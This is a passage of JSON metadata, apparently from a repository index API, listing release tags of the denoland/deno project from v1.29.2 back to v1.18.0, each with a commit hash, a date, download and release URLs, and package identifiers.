es_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/